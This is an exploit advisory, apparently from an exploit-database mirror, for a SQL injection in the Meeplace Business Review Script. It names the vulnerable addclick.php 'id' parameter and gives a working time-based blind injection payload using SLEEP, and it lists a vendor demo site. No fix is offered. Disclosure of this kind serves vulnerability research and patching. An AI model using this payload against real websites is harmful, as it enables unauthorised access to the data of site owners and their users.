Meeplace Business Review Script - 'id' SQL Injection

2019-03-22 15:05:34

# Exploit Title: Meeplace Business Review Script - 'id' SQL Injection
# Date: 22.03.2019
# Dork:
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://www.meeplace.com
# Demo Site: http://demo.meeplace.com
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----

# Request: http://localhost/[PATH]/ad/addclick.php?&id=1
# Vulnerable Parameter: id (GET)
# Payload: &id=1 RLIKE (SELECT * FROM (SELECT(SLEEP(5)))qcFZ)

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.